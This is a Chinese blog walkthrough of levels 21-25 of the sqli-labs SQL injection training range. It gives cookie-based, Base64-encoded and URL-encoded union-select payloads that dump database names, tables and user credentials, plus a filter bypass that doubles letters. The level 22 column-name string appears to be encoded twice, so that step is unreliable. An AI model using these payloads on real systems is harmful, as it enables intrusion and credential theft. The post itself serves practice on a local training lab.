sqli-labs靶场通关攻略 21-25

于 2024-08-22 19:08:10 发布
阅读量558 收藏 13
点赞数 24
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82061181/article/details/141424417
版权

主页有sqli-labs靶场通关攻略 1-20

第二一关 less-21

步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包

步骤二:在Cookie后输入'报错,判断闭合方式为') #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

步骤三:判断列数

') order by 4 #  =>  Jykgb3JkZXIgYnkgNCAj

') order by 3 #  =>  Jykgb3JkZXIgYnkgMyAj

列数为三

步骤四:查询回显点

') union select 1,2,3 #   =>  JykgdW5pb24gc2VsZWN0IDEsMiwzICM=

步骤五:查询数据库

') union select 1,2,database() #  =>  JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=

步骤六:查表名

代码:') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 

转换码:JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=

步骤七:查列名

代码:') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

转换码:

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj

步骤八:查询表中所有数据

代码:') union select 1,2,group_concat(id,username,password) from users #

转换码:JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==

第二二关 less-22

步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包

步骤二:在Cookie后输入'报错,判断闭合方式为" #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

步骤三:判断列数

" order by 4 #  =>  IiBvcmRlciBieSA0ICM=

" order by 3 #  =>  IiBvcmRlciBieSAzICM=

列数为三

步骤四:查询回显点

" union select 1,2,3 #   =>  IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==

步骤五:查询数据库

" union select 1,2,database() #  =>  IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==

步骤六:查表名

代码:" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 

转换码:IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==

步骤七:查列名

代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

转换码:

SWlCMWJtbHZiaUJ6Wld4bFkzUWdNU3huY205MWNGOWpiMjVqWVhRb1kyOXNkVzF1WDI1aGJXVXBMRE1nWm5KdmJTQnBibVp2Y20xaGRHbHZibDl6WTJobGJXRXVZMjlzZFcxdWN5QjNhR1Z5WlNCMFlXSnNaVjl6WTJobGJXRTlKM05sWTNWeWFYUjVKeUJoYm1RZ2RHRmliR1ZmYm1GdFpUMG5kWE5sY25NbklDTT0=

步骤八:查询表中所有数据

代码:" union select 1,2,group_concat(id,username,password) from users #

转换码:IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj

第二三关 less-23

步骤一:用?id=1 --+有数据

                用?id=1 #有数据

发现--+和#过滤

步骤二:判断闭合方式:?id=1' and ' 1 ' =' 1

步骤三:查询回显参数

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201

步骤四:查询数据库

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,database(),3%20and%20%27%201%20%27%20=%27%201

步骤五:查表名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%27%201%20%27%20=%27%201

步骤六:查列名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20%27%201%20%27%20=%27%201

第二四关 less-24

步骤一:注册新用户

步骤二:登录->修改密码

修改成功

第二五关 less-25

步骤一:or 和and 被过滤

利用联合查询闭合方式为id=1' --+

步骤二:查回显参数

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+

步骤三:查询数据库

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+

步骤四:查表名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27%20--+

步骤五:查列名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27%20--+

步骤六:查所有数据

http://127.0.0.1/less-25/?id=-1%27union%20select%201,group_concat(username,0x3a,passwoorrd),3%20from%20users%20--+

云舒zovn
关注
  • 24
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1562
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2048
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3648
sqli-labs靶场通关(1-10)
SQL注入之SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1022
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
sqli-labs靶场通关
wh15320219935的博客
08-05 1011
根据php文件可以看出是进行单引号逃脱加上注释符,有--+ 或者#然后我们可以进行字段数查找使用order by进行查询最大字段数,当输入4的时候发现报错证明最大值为3接下来我们可以使用联合查询union select发现与之前没有任何变化,此时我们可以观察代码发现他只取第一行,所以我们可以让第一个表查询为空,同时可以查询数据库中的一些数据名知道当前的用户权限和库名以后我们就可以进行注入管理员账号密码,想要知道管理员账号密码我们还得需要知道数据库的表名和列名。
sqli-labs-master靶场通关
m0_75208155的博客
08-12 753
sqli-labs-master靶场通关
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 6436
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1421
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
【达梦数据库】-导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 291
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
Spring Boot实现简单的Oracle数据库操作
beautiful77moon的博客
08-18 414
使用到的技术:1. Spring Boot:用于简化Spring应用的开发。2. Dynamic DataSource:实现动态多数据源的访问和切换3. Oracle JDBC Driver:与Oracle数据库进行连接和交互。4. Mybatis-Plus:简化SQL映射和数据库访问。其中BaseMapper接口提供了对数据表进行基本操作的功能。5. Lombok:用于简化Java类的开发,自动生成常用的代码,比如getter、setter、构造函数等。
linux安装达梦数据库
HAN_789的博客
08-19 209
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
分布式事务:基本概念
最新发布
玉汝于成
08-20 235
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 526
【代码】springboot网上商品订单转手系统bootpf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值